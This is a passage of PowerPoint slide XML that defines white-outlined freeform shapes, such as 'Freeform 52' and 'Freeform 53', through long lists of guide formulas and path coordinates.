                  <a:gd name="T1" fmla="*/ 94 h 185"/>
                  <a:gd name="T2" fmla="*/ 128 w 170"/>
                  <a:gd name="T3" fmla="*/ 102 h 185"/>
                  <a:gd name="T4" fmla="*/ 141 w 170"/>
                  <a:gd name="T5" fmla="*/ 107 h 185"/>
                  <a:gd name="T6" fmla="*/ 145 w 170"/>
                  <a:gd name="T7" fmla="*/ 116 h 185"/>
                  <a:gd name="T8" fmla="*/ 148 w 170"/>
                  <a:gd name="T9" fmla="*/ 122 h 185"/>
                  <a:gd name="T10" fmla="*/ 150 w 170"/>
                  <a:gd name="T11" fmla="*/ 131 h 185"/>
                  <a:gd name="T12" fmla="*/ 162 w 170"/>
                  <a:gd name="T13" fmla="*/ 130 h 185"/>
                  <a:gd name="T14" fmla="*/ 170 w 170"/>
                  <a:gd name="T15" fmla="*/ 140 h 185"/>
                  <a:gd name="T16" fmla="*/ 168 w 170"/>
                  <a:gd name="T17" fmla="*/ 164 h 185"/>
                  <a:gd name="T18" fmla="*/ 168 w 170"/>
                  <a:gd name="T19" fmla="*/ 173 h 185"/>
                  <a:gd name="T20" fmla="*/ 165 w 170"/>
                  <a:gd name="T21" fmla="*/ 183 h 185"/>
                  <a:gd name="T22" fmla="*/ 158 w 170"/>
                  <a:gd name="T23" fmla="*/ 176 h 185"/>
                  <a:gd name="T24" fmla="*/ 148 w 170"/>
                  <a:gd name="T25" fmla="*/ 177 h 185"/>
                  <a:gd name="T26" fmla="*/ 148 w 170"/>
                  <a:gd name="T27" fmla="*/ 185 h 185"/>
                  <a:gd name="T28" fmla="*/ 132 w 170"/>
                  <a:gd name="T29" fmla="*/ 168 h 185"/>
                  <a:gd name="T30" fmla="*/ 112 w 170"/>
                  <a:gd name="T31" fmla="*/ 152 h 185"/>
                  <a:gd name="T32" fmla="*/ 102 w 170"/>
                  <a:gd name="T33" fmla="*/ 141 h 185"/>
                  <a:gd name="T34" fmla="*/ 88 w 170"/>
                  <a:gd name="T35" fmla="*/ 123 h 185"/>
                  <a:gd name="T36" fmla="*/ 80 w 170"/>
                  <a:gd name="T37" fmla="*/ 104 h 185"/>
                  <a:gd name="T38" fmla="*/ 68 w 170"/>
                  <a:gd name="T39" fmla="*/ 89 h 185"/>
                  <a:gd name="T40" fmla="*/ 60 w 170"/>
                  <a:gd name="T41" fmla="*/ 80 h 185"/>
                  <a:gd name="T42" fmla="*/ 55 w 170"/>
                  <a:gd name="T43" fmla="*/ 63 h 185"/>
                  <a:gd name="T44" fmla="*/ 44 w 170"/>
                  <a:gd name="T45" fmla="*/ 55 h 185"/>
                  <a:gd name="T46" fmla="*/ 37 w 170"/>
                  <a:gd name="T47" fmla="*/ 50 h 185"/>
                  <a:gd name="T48" fmla="*/ 32 w 170"/>
                  <a:gd name="T49" fmla="*/ 39 h 185"/>
                  <a:gd name="T50" fmla="*/ 19 w 170"/>
                  <a:gd name="T51" fmla="*/ 31 h 185"/>
                  <a:gd name="T52" fmla="*/ 5 w 170"/>
                  <a:gd name="T53" fmla="*/ 17 h 185"/>
                  <a:gd name="T54" fmla="*/ 0 w 170"/>
                  <a:gd name="T55" fmla="*/ 3 h 185"/>
                  <a:gd name="T56" fmla="*/ 4 w 170"/>
                  <a:gd name="T57" fmla="*/ 0 h 185"/>
                  <a:gd name="T58" fmla="*/ 13 w 170"/>
                  <a:gd name="T59" fmla="*/ 6 h 185"/>
                  <a:gd name="T60" fmla="*/ 24 w 170"/>
                  <a:gd name="T61" fmla="*/ 8 h 185"/>
                  <a:gd name="T62" fmla="*/ 34 w 170"/>
                  <a:gd name="T63" fmla="*/ 6 h 185"/>
                  <a:gd name="T64" fmla="*/ 47 w 170"/>
                  <a:gd name="T65" fmla="*/ 19 h 185"/>
                  <a:gd name="T66" fmla="*/ 54 w 170"/>
                  <a:gd name="T67" fmla="*/ 31 h 185"/>
                  <a:gd name="T68" fmla="*/ 73 w 170"/>
                  <a:gd name="T69" fmla="*/ 41 h 185"/>
                  <a:gd name="T70" fmla="*/ 74 w 170"/>
                  <a:gd name="T71" fmla="*/ 48 h 185"/>
                  <a:gd name="T72" fmla="*/ 87 w 170"/>
                  <a:gd name="T73" fmla="*/ 59 h 185"/>
                  <a:gd name="T74" fmla="*/ 88 w 170"/>
                  <a:gd name="T75" fmla="*/ 56 h 185"/>
                  <a:gd name="T76" fmla="*/ 96 w 170"/>
                  <a:gd name="T77" fmla="*/ 61 h 185"/>
                  <a:gd name="T78" fmla="*/ 105 w 170"/>
                  <a:gd name="T79" fmla="*/ 66 h 185"/>
                  <a:gd name="T80" fmla="*/ 112 w 170"/>
                  <a:gd name="T81" fmla="*/ 77 h 185"/>
                  <a:gd name="T82" fmla="*/ 124 w 170"/>
                  <a:gd name="T83" fmla="*/ 80 h 185"/>
                  <a:gd name="T84" fmla="*/ 135 w 170"/>
                  <a:gd name="T85" fmla="*/ 88 h 185"/>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70"/>
                  <a:gd name="T130" fmla="*/ 0 h 185"/>
                  <a:gd name="T131" fmla="*/ 170 w 170"/>
                  <a:gd name="T132" fmla="*/ 185 h 185"/>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70" h="185">
                    <a:moveTo>
                      <a:pt x="135" y="89"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="134" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="89"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36320" name="Freeform 52"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4555" y="3074"/>
                <a:ext cx="17" cy="9"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10 w 17"/>
                  <a:gd name="T1" fmla="*/ 9 h 9"/>
                  <a:gd name="T2" fmla="*/ 7 w 17"/>
                  <a:gd name="T3" fmla="*/ 7 h 9"/>
                  <a:gd name="T4" fmla="*/ 1 w 17"/>
                  <a:gd name="T5" fmla="*/ 4 h 9"/>
                  <a:gd name="T6" fmla="*/ 0 w 17"/>
                  <a:gd name="T7" fmla="*/ 2 h 9"/>
                  <a:gd name="T8" fmla="*/ 3 w 17"/>
                  <a:gd name="T9" fmla="*/ 2 h 9"/>
                  <a:gd name="T10" fmla="*/ 7 w 17"/>
                  <a:gd name="T11" fmla="*/ 1 h 9"/>
                  <a:gd name="T12" fmla="*/ 10 w 17"/>
                  <a:gd name="T13" fmla="*/ 0 h 9"/>
                  <a:gd name="T14" fmla="*/ 17 w 17"/>
                  <a:gd name="T15" fmla="*/ 4 h 9"/>
                  <a:gd name="T16" fmla="*/ 14 w 17"/>
                  <a:gd name="T17" fmla="*/ 5 h 9"/>
                  <a:gd name="T18" fmla="*/ 13 w 17"/>
                  <a:gd name="T19" fmla="*/ 6 h 9"/>
                  <a:gd name="T20" fmla="*/ 10 w 17"/>
                  <a:gd name="T21" fmla="*/ 9 h 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7"/>
                  <a:gd name="T34" fmla="*/ 0 h 9"/>
                  <a:gd name="T35" fmla="*/ 17 w 17"/>
                  <a:gd name="T36" fmla="*/ 9 h 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7" h="9">
                    <a:moveTo>
                      <a:pt x="10" y="9"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="9"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36321" name="Freeform 53"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4590" y="3073"/>
                <a:ext cx="37" cy="17"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 20 w 37"/>
                  <a:gd name="T1" fmla="*/ 6 h 17"/>
                  <a:gd name="T2" fmla="*/ 18 w 37"/>
                  <a:gd name="T3" fmla="*/ 6 h 17"/>
                  <a:gd name="T4" fmla="*/ 17 w 37"/>
                  <a:gd name="T5" fmla="*/ 5 h 17"/>
                  <a:gd name="T6" fmla="*/ 16 w 37"/>
                  <a:gd name="T7" fmla="*/ 3 h 17"/>
                  <a:gd name="T8" fmla="*/ 17 w 37"/>
                  <a:gd name="T9" fmla="*/ 2 h 17"/>
                  <a:gd name="T10" fmla="*/ 18 w 37"/>
                  <a:gd name="T11" fmla="*/ 1 h 17"/>
                  <a:gd name="T12" fmla="*/ 21 w 37"/>
                  <a:gd name="T13" fmla="*/ 0 h 17"/>
                  <a:gd name="T14" fmla="*/ 22 w 37"/>
                  <a:gd name="T15" fmla="*/ 1 h 17"/>
                  <a:gd name="T16" fmla="*/ 22 w 37"/>
                  <a:gd name="T17" fmla="*/ 2 h 17"/>
                  <a:gd name="T18" fmla="*/ 24 w 37"/>
                  <a:gd name="T19" fmla="*/ 3 h 17"/>
                  <a:gd name="T20" fmla="*/ 26 w 37"/>
                  <a:gd name="T21" fmla="*/ 2 h 17"/>
                  <a:gd name="T22" fmla="*/ 28 w 37"/>
                  <a:gd name="T23" fmla="*/ 3 h 17"/>
                  <a:gd name="T24" fmla="*/ 29 w 37"/>
                  <a:gd name="T25" fmla="*/ 4 h 17"/>
                  <a:gd name="T26" fmla="*/ 29 w 37"/>
                  <a:gd name="T27" fmla="*/ 7 h 17"/>
                  <a:gd name="T28" fmla="*/ 30 w 37"/>
                  <a:gd name="T29" fmla="*/ 6 h 17"/>
                  <a:gd name="T30" fmla="*/ 31 w 37"/>
                  <a:gd name="T31" fmla="*/ 4 h 17"/>
                  <a:gd name="T32" fmla="*/ 34 w 37"/>
                  <a:gd name="T33" fmla="*/ 4 h 17"/>
                  <a:gd name="T34" fmla="*/ 35 w 37"/>
                  <a:gd name="T35" fmla="*/ 5 h 17"/>
                  <a:gd name="T36" fmla="*/ 35 w 37"/>
                  <a:gd name="T37" fmla="*/ 8 h 17"/>
                  <a:gd name="T38" fmla="*/ 37 w 37"/>
                  <a:gd name="T39" fmla="*/ 8 h 17"/>
                  <a:gd name="T40" fmla="*/ 37 w 37"/>
                  <a:gd name="T41" fmla="*/ 9 h 17"/>
                  <a:gd name="T42" fmla="*/ 37 w 37"/>
                  <a:gd name="T43" fmla="*/ 12 h 17"/>
                  <a:gd name="T44" fmla="*/ 35 w 37"/>
                  <a:gd name="T45" fmla="*/ 10 h 17"/>
                  <a:gd name="T46" fmla="*/ 32 w 37"/>
                  <a:gd name="T47" fmla="*/ 10 h 17"/>
                  <a:gd name="T48" fmla="*/ 31 w 37"/>
                  <a:gd name="T49" fmla="*/ 10 h 17"/>
                  <a:gd name="T50" fmla="*/ 32 w 37"/>
                  <a:gd name="T51" fmla="*/ 11 h 17"/>
                  <a:gd name="T52" fmla="*/ 26 w 37"/>
                  <a:gd name="T53" fmla="*/ 13 h 17"/>
                  <a:gd name="T54" fmla="*/ 25 w 37"/>
                  <a:gd name="T55" fmla="*/ 12 h 17"/>
                  <a:gd name="T56" fmla="*/ 26 w 37"/>
                  <a:gd name="T57" fmla="*/ 10 h 17"/>
                  <a:gd name="T58" fmla="*/ 25 w 37"/>
                  <a:gd name="T59" fmla="*/ 10 h 17"/>
                  <a:gd name="T60" fmla="*/ 23 w 37"/>
                  <a:gd name="T61" fmla="*/ 11 h 17"/>
                  <a:gd name="T62" fmla="*/ 21 w 37"/>
                  <a:gd name="T63" fmla="*/ 13 h 17"/>
                  <a:gd name="T64" fmla="*/ 19 w 37"/>
                  <a:gd name="T65" fmla="*/ 13 h 17"/>
                  <a:gd name="T66" fmla="*/ 14 w 37"/>
                  <a:gd name="T67" fmla="*/ 15 h 17"/>
                  <a:gd name="T68" fmla="*/ 10 w 37"/>
                  <a:gd name="T69" fmla="*/ 16 h 17"/>
                  <a:gd name="T70" fmla="*/ 7 w 37"/>
                  <a:gd name="T71" fmla="*/ 16 h 17"/>
                  <a:gd name="T72" fmla="*/ 5 w 37"/>
                  <a:gd name="T73" fmla="*/ 17 h 17"/>
                  <a:gd name="T74" fmla="*/ 2 w 37"/>
                  <a:gd name="T75" fmla="*/ 16 h 17"/>
                  <a:gd name="T76" fmla="*/ 2 w 37"/>
                  <a:gd name="T77" fmla="*/ 16 h 17"/>
                  <a:gd name="T78" fmla="*/ 0 w 37"/>
                  <a:gd name="T79" fmla="*/ 15 h 17"/>
                  <a:gd name="T80" fmla="*/ 0 w 37"/>
                  <a:gd name="T81" fmla="*/ 13 h 17"/>
                  <a:gd name="T82" fmla="*/ 1 w 37"/>
                  <a:gd name="T83" fmla="*/ 11 h 17"/>
                  <a:gd name="T84" fmla="*/ 0 w 37"/>
                  <a:gd name="T85" fmla="*/ 9 h 17"/>
                  <a:gd name="T86" fmla="*/ 2 w 37"/>
                  <a:gd name="T87" fmla="*/ 8 h 17"/>
                  <a:gd name="T88" fmla="*/ 3 w 37"/>
                  <a:gd name="T89" fmla="*/ 7 h 17"/>
                  <a:gd name="T90" fmla="*/ 5 w 37"/>
                  <a:gd name="T91" fmla="*/ 6 h 17"/>
                  <a:gd name="T92" fmla="*/ 7 w 37"/>
                  <a:gd name="T93" fmla="*/ 7 h 17"/>
                  <a:gd name="T94" fmla="*/ 11 w 37"/>
                  <a:gd name="T95" fmla="*/ 7 h 17"/>
                  <a:gd name="T96" fmla="*/ 14 w 37"/>
                  <a:gd name="T97" fmla="*/ 7 h 17"/>
                  <a:gd name="T98" fmla="*/ 14 w 37"/>
                  <a:gd name="T99" fmla="*/ 10 h 17"/>
                  <a:gd name="T100" fmla="*/ 16 w 37"/>
                  <a:gd name="T101" fmla="*/ 10 h 17"/>
                  <a:gd name="T102" fmla="*/ 19 w 37"/>
                  <a:gd name="T103" fmla="*/ 11 h 17"/>
                  <a:gd name="T104" fmla="*/ 20 w 37"/>
                  <a:gd name="T105" fmla="*/ 9 h 17"/>
                  <a:gd name="T106" fmla="*/ 22 w 37"/>
                  <a:gd name="T107" fmla="*/ 9 h 17"/>
                  <a:gd name="T108" fmla="*/ 22 w 37"/>
                  <a:gd name="T109" fmla="*/ 7 h 17"/>
                  <a:gd name="T110" fmla="*/ 20 w 37"/>
                  <a:gd name="T111" fmla="*/ 6 h 17"/>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37"/>
                  <a:gd name="T169" fmla="*/ 0 h 17"/>
                  <a:gd name="T170" fmla="*/ 37 w 37"/>
                  <a:gd name="T171" fmla="*/ 17 h 17"/>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37" h="17">
                    <a:moveTo>
                      <a:pt x="20" y="6"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="18" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="7"/>
                    </a:lnTo>
